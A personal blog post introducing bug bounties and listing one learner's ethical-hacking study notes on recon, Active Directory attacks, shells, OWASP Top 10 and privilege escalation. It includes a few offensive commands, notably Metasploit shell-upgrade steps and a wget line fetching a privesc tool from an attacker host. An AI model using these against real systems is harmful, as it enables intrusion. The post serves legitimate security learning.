Ethical Hacking Diaries #1 — WTF is a Bug Bounty? — Ceos3c

I was thinking about starting this for a long time. I am still not sure if I want to dedicate myself to another task, but I have the feeling this is the right thing to do. But, where to start? And start what actually? We’ll get to this. This first part of the Ethical Hacking Diaries is going to be rather lengthy, as I need to explain where I am coming from and what exactly all of this is about.

This blog initially started as a platform to document stuff for none other than myself. I wanted to write stuff that I eventually need again later down somewhere, so I thought the easiest way to keep things organized was by starting a blog. In the past few years, I mostly created very thorough step-by-step tutorials for complicated things revolving around Linux, Open Source and the occasional Hacking tutorial. Enabling even a beginner to follow through a complicated task like setting up a FOG imaging server.

I never really used this platform as an actual blog in the classic sense. But I want to change that, I don’t want to be just another tutorial site like hundred others out there, I strive to build a community of likeminded people.

Now what has triggered that shift in perspective you might ask? Let me elaborate.

Over the past few years, I went on and off on a journey to become an Ethical Hacker. I was interested in Hacking since I was a little kid when I have seen the movie Hackers, with a back in the day very young (and god damn attractive) Angelina Jolie. Even I devoured all kinds of Hacking movies throughout my childhood, I never actually started with Hacking, because simply put, I always thought I was too dumb for it, so I didn’t even bother starting.

That has changed around 2012 when I had an old laptop lying around that I didn’t know what to do with. I don’t recall how I came on it back then, but I ended up installing BackTrack 2 on it (Kali Linux’s predecessor). I had no freaking clue what I was doing. I played around with it a bit, started a couple of tools and didn’t know what to do. That was when I discovered Kody’s blog over at Nullbyte. My heart almost stopped when I found out that there are actual step-by-step instructions out there on how to test the strength of (your own 😉 ) WiFi Network. I was immediately hooked and ordered my (still going strong) Alfa AWUS036H network adapter.

Even I dug it, I still didn’t take it seriously enough. I just played around with some BackTrack, and later Kali tools. A couple of years had to pass until things started to change.

My day job until today is being a System Administrator. I have 10+ years of experience in the industry. But I never considered that being an actual Hacker would be a possible career path for me.

Things started changing

2016, the year I created Ceos3c. From 2016 on I had a little bit more contact with the Hacking world. At that point, I probably installed Kali Linux over a hundred times, because I always f***** up my system at some point, therefore I was ready to create my first “How to install Kali Linux” tutorial.

A little bit later, in 2017, I even created my first OverTheWire Bandit Walkthrough on YouTube. IF you watch the video ( don’t), you know that I still didn’t have a freaking clue about Hacking. At this point, I already created very lengthy and complex tutorials about AWS Cloud stuff, all kinds of Open Source projects, even a couple of very basic Nmap Tutorials and so forth, yet I still thought I was way too dumb to learn “real Hacking”. I already dabbled a bit in CTF’s using Vulnhub at this point, but I was only able to solve challenges if any of my tools (Metasploit, Nmap, etc) found a vulnerability. Because, you guessed it right, I had no freaking idea what I was doing. Imposter syndrome is real.

From 2017 to 2019 I created a couple of beginner tutorial series for Metasploit, Nmap and all the other well-known tools. I knew the basics, I knew how to solve some very easy CTF’s, but I still had no “real Hacking” knowledge. I started to read more about Web Application Security and I think right around the summer of 2019 I heard the word “ Bug Bounty “ for the first time in my life.

Why not just become a Full-Stack Web Developer?

In Juli 2019 I had the idea to become a Full-Stack Web Developer. To be honest, at this point, I was burnt out. I didn’t want to write any more step-by-step articles about topics I didn’t care about (Go to hell, Anaconda!).

I always wanted to learn how to code, but learning Python was always too theoretical for me, as I am more of a visual learner. So I decided to go for Web Development. After all, at that point, I already created around 10 different Websites using mostly WordPress, but I was always annoyed by how constrained you are with those frameworks, but I enjoyed the designing part, so I figured, why not try?

Another reason in the back of my head was I wanted to learn Web Dev to better understand Web Apps because I had no idea how stuff worked behind the curtain. I had some hopes that I would become a better Hacker, no matter how the whole endeavor would turn out in the end.

From Juli of 2019 until about October 2019 I went full-boar into Web Development and finished almost two 45h boot camps. I decided to go for JavaScript, Node, React… The trendy thing to do. I enjoyed the journey. I finally started to understand, at least in bits, how things work and why you use JavaScript and how HTML works, etc.

At the beginning of October 2019, I had a Yoga Teacher Training scheduled in Thailand that would take out 6 weeks of my life without the chance of doing any learning or any computer stuff. I kind of knew beforehand that this probably would be the breaking point for me, that after the training I probably wouldn’t get back into Web Development and search something new.

Now, don’t get me wrong. Before flying to Thailand, I was able to create a Full-Stack Web App from scratch. I knew my HTML, my CSS, and just enough JS to create simple but good looking projects. I liked coding at this point. But when I came back, I needed a bit of time to get back into it. But I never fully did. As expected. I was drawn back to something else, the only thing that has always stuck with me over the years.

I started to become more interested in Hacking again (hey, surprise!). Now that I knew a bit more about how Websites work, how the Web works in general and so on, I thought It’d be a good time to start digging into Hacking again.

Looking back, I don’t regret spending countless hours on becoming a Web Developer. I even had an interview lined up as a Junior Developer, but I canceled it in the end. I somehow knew this path wouldn’t make me happy either. Sitting in an office coding away on stupid business applications I couldn’t care less about didn’t sound tempting to me, at all.

A New Dawn

I needed a plan. And fast. I recalled that I heard about “Bug Bounties” about a half a year ago, and I hit up YouTube. I discovered STÖK’s YouTube Channel and got a primer on Bug Bounties. Not only did his persona resonate with me, but the whole Bug Bounty thing sounded like exactly the area I want to work in.

I went down a Rabbit Hole. I discovered other names in this space that kept popping up again and again like @Nahamsec, @tomnomnom, @thecybermentor, @jhaddix and a couple of others. I consumed all of their content about how to get started with Bug Bounties on YouTube and on Blogs. It seemed like exactly the community I want to be involved with. Lots of like-minded people who have fun to break stuff, the only problem was/is, I am really bad at Web Applications.

It became even more clear that I needed a plan and a good one that is.

Becoming a Student again

Before embarking on this Web Application Security journey, I had some experience with infrastructure. I knew the basics, I knew how to use Linux, how to use the Metasploit, Nmap and some other tools, but I never had any false expectations of myself, I consider myself a noob at hacking, and that probably will never change. But I like to be the dumbest person in the room and ask questions because that’s the way you learn.

When learning something new, I like structure. This got clear to me when I did my Web Development Bootcamps, which were very well structured. I needed something like that.

Oh boy, was I lucky, that The Cyber Mentor just released his absolutely, ridiculously excellent “ Practical Ethical Hacking “ course on Udemy. EXACTLY what I needed! The course takes about 25 hours and I think I finished it within 2 weeks. Hands down, this is the best Hacking course out there right now.

I learned a ton doing this course. And I am going to do the whole freaking thing again, that’s how awesome it was.

I finished my course, let’s start Bug Bounty hunting!

That was my expectation. As we all know, expectations != reality. I now have kind of solid basics, but to find bugs on a live website is really, really hard. This was just the beginning, but I was excited and ready to dig in.

I quickly realized that I have a lot to learn before I will find my first bug. I bought a Hackthebox premium account and got started because, in my opinion, there is no better way to learn than to try to break stuff. So far, I have ~7 boxes under my belt.

Game Plan

My game plan at this point looks like this: Hack stuff, every single day. I didn’t find a Bug Bounty program I’d like to stick with yet, otherwise, I’d practice on that. But to be honest, I find it hard to choose a program as a beginner, I guess that’s one of the hardest parts.

Seeing programs with more than 300 participants seems pretty frightening if you measure your skills to be at level 0.5 from 10. I’ll let you know as soon as I’ve chosen a program to hack on.

This new series of Blogs will also be a part of this Game Plan, I will try to write down what I have learned within a week to fortify my knowledge, and of course, to share it with you guys. This community is so incredibly helpful and supportive, that I want to give back, and that’s what I’m trying to do with those blog posts.

So, to get back to the actual topic of this post.

So, WTF is a Bug Bounty?!

By now you probably have looked up that information by yourself, but in case you did not, let me give you a very high-level overview over what Bug Bounties are.

Simply put, a Bug Bounty Program is a program that was intentionally put together by a company to allow hackers to legally test the security of their Website, App, API or a whole CIDR range, and not only that but also get rewarded if they find a vulnerability.

Hacker One and Bugcrowd are the platforms where those programs are hosted on. I won’t go over the whole legal thing because I don’t want to give any false information as I am new to this thing myself, the info is out there, look it up.

The company who created a Bug Bounty Program also provides a scope on which you can legally hack, and they also provide “out of scope” items that you are not allowed to hack on. They also provide certain rules you need to adhere to.

Every program is different. Some programs only offer points for prestige and rank on either of the platforms, others offer low to very high (10.000$+++) rewards per vulnerability.

There are also invite-only programs where you only get invited to if you reach a certain rank. Those programs offer even far higher rewards for findings, and there are events and Hackathons hosted by either Hacker One or Bugcrowd, where extremely high rewards are possible. Those events are also used to get to know each other and hack together with the community, a great thing in my opinion!

Now don’t any false hopes. You don’t start learning how to hack and within a month you’ll find your first 10.000$ bug. That’s not how it works. There are a lot of professionals with decades of experience on those platforms. There is no easy money in Bug Bounty, the sooner one realizes that, the better. You have to enjoy this stuff, if you are in for the money, I don’t see much hope for you.

That, in essence, is what bug bounty programs are. They give hackers a platform to be “on the good side” and earn their living without the need of participating in criminal activity. It also spawns a whole new breed of Hackers, those who legitimately want to make the Internet safer.

What have I learned in the past month?

A ton. I probably have learned more about Hacking in the past month than in the past 5 years combined. Again, doing The Cyber Mentor’s course was extremely helpful, but I have to do it again because I already forgot certain things. Taking notes is extremely important btw.

In this blog post, because it is the first one, I’ll tell you what I have learned in the past month. The next blogs will be shorter and only cover what I have learned in the past week.

I will just give you an overview. If you are interested in a topic, in particular, leave a comment below and I will try to cover it more in-depth in a separate article or video. This will be another lengthy section below, I will go through my notes and let you know what I have learned in each topic.

Methodology

I start with Methodology because I think building your Methodology is one of the most important things. For me, it helps me to stay organized and going through a certain set of steps helps me. At this moment, on every CTF that I practice on, I refine my Methodology and my notes. I cut certain steps out and add others in.

If you want to learn about Methodology, check out Jason Haddix’s video. There are tons of material out there regarding the Hacking methodology.

The importance of Notes

I knew that taking good notes is very important, thanks to the two Web Development Bootcamps I went through, I had established a solid note-taking game already. I use Evernote. For me, it’s the most comfortable way of keeping my notes sorted nicely, it’s also free.

Taking good notes as Hacker / Pentester / Bug Hunter is crucial. You will work with your Notes open at all times, at least I do, and I think other Hackers are doing this too.

Own your notes, keep them organized, refine them and learn to love them.

Reconnaissance

I learned a ton about doing good reconnaissance. The more stuff you gather the easier it is for you to get access. If you slack in recon, you’ll struggle at executing later.

I knew a bit of Reconnaissance beforehand, but especially in regards to Web, I learned a lot of new stuff.

Passive Reconnaissance Tools

• Target Validation
• WHOIS Lookup
• nslookup
• dnsrecon

Subdomain Enumeration

• Google
• Dig
• Nmap
• Sublist3r
• Bluto
• crt.sh
• Amass

Fingerprinting

• Nmap
• Wappalyzer
• WhatWeb
• BuiltWith
• Netcat

Data Breaches

• HaveIBeenPwned
• Hunter.io
• Breach-Parse

That’s a lot of stuff to wrap your head around. You pick what works for you and integrate it into your Methodology.

Active Directory

The AD part of The Cyber Mentor’s course is excellent. I learned a ton from it. Let me summarize:

General AD Stuff

• The AD DS Data Store
• Ntds.dit file (Hashes passwords)
• SAM Hashes
• Local User hashes
• Kerberos
• How Kerberos works

Top Five Ways I got Domain Admin before Lunch

• Very worth-while read

Domain Enumeration

• PowerView

Gaining Domain Access

• LLMNR Poisoning
• SMB Relay Attacks
• BloodHound — Downloads Domain Data & Visualizes it. Very useful.

Pass the Hash Attacks

• NTLM vs NTLMv2
• NTLM hashes can be passed, NTLMv2 hashes not!

Crackmapexec

• Only works if credentials are available. Tool passes the password to other services/machines.
• Using psexec.py to connect with the gathered hash

Secretdumps.py

• Used to dump hashes

Mitigation of Pass The Hash attacks

• Limit Account Re-Use
• Strong Passwords
• Privilege Access Management

Token Impersonation

• What are tokens?

Temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. “Cookies for computers”

Token Impersonation Attack

• Requires a Username + Password of any machine

Kerberoasting

• Using Impacket
• Needs User Account with Credentials to work. It doesn’t need to be an Admin account.

GPP / cPassword Attacks

• Always worth checking for, especially on older Servers.
• Metasploit Module -> auxiliary/smb_enum_gpp

Mimikatz

• Tool used to Dump Hashes of all kind
• SAM Hashes
• Golden Ticket Attacks

Active Directory is a huge topic on its own. I have to go through the course again to fully understand all of it, but I leveled up my AD game a few levels.

Shells

I don’t know how else to call this, but I feel like this deserves its own section. Running manual exploits usually leaves you with dumb shells, which you generally want to elevate to beautiful shells. I learned a lot about this and it is extremely helpful to have a fully interactive shell compared to a dumb one.

This is an excellent Article about Upgrading Simple Shells to Fully Interactive ones by Ropnop. Read it.

Metasploit

Elevate Dumb Shell to Meterpreter Shells

• After a dumb shell was created with a Metasploit Exploit hit CTRL + Z to move the shell to the background
• Type: sessions and note the session ID
• Type: sessions -u 1 -> This spawns a meterpreter shell if available
• Type: sessions -i 2 -> To use the newly spawned meterpreter shell

Reverse Shell vs Bind Shell

• Reverse Shell — Target connects to attacker
• Bind Shell — Attacker connects to target

If Username + Password are available

• Create Meterpreter Shell from scratch with exploit/windows/smb/psexec

Impacket

• Can also be used to create Shells
• smbexec
• wmiexec
• psxec

Transferring Files

When exploiting servers, you will most likely find yourself in a situation where you want to either upload a tool or an exploit to a server or, download files from the server to your attacking machine. I learned a couple of techniques that help you with that.

SimpleHTTPServer

• Pre-installed on Kali
• Starts an HTTP Server on Port 8000 in the current directory which can be accessed from other hosts on the network to transfer files.
• You can use: wget http://ipofattacker:8000/unix-privesc-check.tar to download files
• Certutil
• Pyftpdlib

SSH

• I like this method a lot if you have an SSH user to the target
• scp /path/to/file username@IP:/path/to/destination
• use pwd on target to see the correct directory

Web

Now to the fun part. I put my focus on Web because I want to get started with Bug Bounties. So I learned a ton here as well. Burp should be a part on its own because it is so widely used in Web Application testing, but I’ll try to summarize as best as I can. I upgraded to Burp Pro since my trial has expired. You can use the free community edition with limited functionality, which is perfectly fine for the beginning.

The OWASP Top Ten

The OWASP TOP 10 is a list of the Top 10 Web Application Security Risks. The OWASP Top 10 are going to be a part of every interview you are going to participate it. I actually just went through one, they asked a ton of OWASP questions. I knew I needed to at least understand the OWASP Top Ten on a high level, so once again, the Cyber Mentor’s course helped me ton to understand them, as he goes over every one of them.

1 — SQL Injection

• Testing for SQL injection using Burp Intruder
• Logging in as the admin without authentication using SQL Injection (So much fun)
• Learning about SQL Injection Payloads and how to use Intruder to test for them
• Learned how to prevent SQL Injection

2 — Broken Authentication

• Enumerate users or emails through improperly configured login forms
• Abuse forgot password forms for user enumeration

3 — Sensitive Data Exposure

• Looking through all kinds of folders on a website in Burp
• Searching for Keys
• Checking Security Headers
• Testing SSL with Nmap’s ssl-enum-ciphers script

4 — XXE (XML External Entities)

• XXE Payloads
• Trying XML payload uploads and checking burp what is returned
• How to prevent XXE

5 — Broken Access Control

• Checking HTML code for hidden forms or fields, etc.
• Unauthenticated access to restricted areas

6 — Security Misconfiguration

• One of the most common issues
• Result of insecure configurations
• Outdated libraries or services

7 — XSS (Cross-Site Scripting)

• I ❤ XSS
• XSS Payloads
• How to test for XSS using Burp
• Different Types of XSS (Stored, Reflected, DOM)
• How to prevent XSS

8 — Insecure Deserialization

• Rather uncommon and hard to exploit
• Leads to RCE

9 — Using Components with Known Vulnerabilities

• Learned how to scan for those using Burp extensions
• Struts 2

10 — Insufficient Logging & Monitoring

• Can be exploited to maintain system access or pivot through the system
• Brute Force undetected
• Failing to detect breaches

Knowing the OWASP Top 10 is essential for doing Bug Bounties. Period. You have to have those down and then take your study further from there.

Burp Suite

• Most popular tool for Bug Bounties (literally everyone uses Burp)

General Stuff

• Learned all the basic functionality
• Learned what all the different tabs are doing
• Learned how to read traffic
• Learned about scopes
• Learned how to recognize successful fuzzing attempts

Intruder

• Burp Intruder can be used to attack all kinds of forms
• You can run brute-force attacks using Burp Intruder
• You can test for XSS, SQL Injection and Fuzz all the things with Intruder
• Credential Stuffing

Repeater

• Repeater allows you to modify requests and send them to the server

Extender

• Lots of Burp Addons are available to install

Decoder

• Allows you to decode stuff (base64 for example) right in Burp

I feel like this is just a small part of what Burp is, but it would get out of hand to put everything in here now. I will add to it in the following Blog posts in greater detail.

Directory Brute-Force

• Using Gobuster or Dirbuster
• Very important to find hidden files, dev sites, or generally get an overview of a websites folder hierarchy

Subdomain Enumeration

• As previously mentioned in Passive Reconnaissance — Very important in Bug Bounties to find hidden subdomains, dev subdomains etc.
• Owasp Amass
• Sublist3r
• crth.sh
• Assetfinder
• Httprobe
• Gowitness

Enumerating Web Tech

• How websites are built
• Wappalyzer Firefox Addon
• WhatWeb (Kali Tool)

Now there is a lot more I could go over, but I feel like it makes more sense going a bit more in-depth into those topics in future blog posts.

One last thing I want to mention tho is what I have learned from Hackthebox within this time.

Stuff learned from Hackthebox

I use Hackthebox almost exclusively as my practice resource next to actual Bug Bounties. In the coming Blog articles, you will read a lot about what I have learned from solving Hackthebox machines. According to their TOS, I am only allowed to share details on machines that are already retired.

You will also find walkthroughs of Hackthebox machines on my YouTube Channel in the future. I will also do quick weekly Vlogs about stuff I have learned over there. Make sure to subscribe.

Because this post is already becoming a behemoth and potentially the longest article I have written on here, I will keep the last month’s “what I’ve learned from Hackthebox” in an easily digestible bullet point format.

Privilege Escalation

• Learned a lot about Linux Privilege Escalation
• unix-privesc-check
• linpeas
• manual file enumeration(Great read!)

Redis

• Learned what Redis is and how to exploit it

SSH keys

• Learned a ton about SSH keys and how to exploit them
• Also learned how to crack them if a weak password is used

Exploits

• Learned how to use manual exploits
• Learned how to read exploits
• Learned that I need to decode some exploits so they work on Linux with dos2unix
• Example on Kali: dos2unix 47681.sh

Bash

• Learned how Bash exploits use ${} placeholder values

Enumeration

• Enumerate all the things.
• If you are stuck — Enumerate some more
• Look through all folders on a Server
• Check .ssh folders
• Check /opt/ folders
• Check /home/ folders
• Check folders and config files of installed services
• Did I mention to enumerate some more?

Password Cracking

• Cracking all kinds of passwords using tools like
• Hashcat
• JohnTheRipper
• Hydra
• Burp Suite

Brute Forcing stuff on CTF’s

• …Is mostly pointless

Searchsploit

• Learned how Searchsploit works and how useful it is

Searching for Exploits

• Google all the Server/Service versions you find through enumeration and look for exploits
• The key to easy CTF’s

SMB

• nmblookup
• smbclient
• nmap
• rpcclient
• enum4linux
• smbmap
• Great read on SMB and a great workflow

Does this ever end?

Even I already spent five hours writing this blog post, I feel like we are just scratching the surface. I probably have forgotten to mention several things I’ve learned, but I felt like I needed to initiate this whole series with as much detail as I could.

The next posts will be much more in-depth and we will be going more technical on all the different things.

I hope that this series will find someone’s interest, and in the best, motivate some of you to get started as well. I’m not gonna lie, it is hard. It is hard, but with this blog, I want to show you that it’s possible if you put in the work. I do not come from a background of higher education, I learned everything I know by myself and with the help of the incredible Hacking community. Now is the time to give back, and I hope I can achieve this through this blog.

Wrapping Up

All of that being said, I hope to see you back the next week. You can follow me on Social Media or Subscribe to the Newsletter in the Sidebar to stay up-to-date with this blog. Thanks for reading!

Check out Ceos3c.com as well, I have a lot of beginner-friendly Hacking & Linux tutorials up there to get you started!

Originally published at https://www.ceos3c.com on March 10, 2020.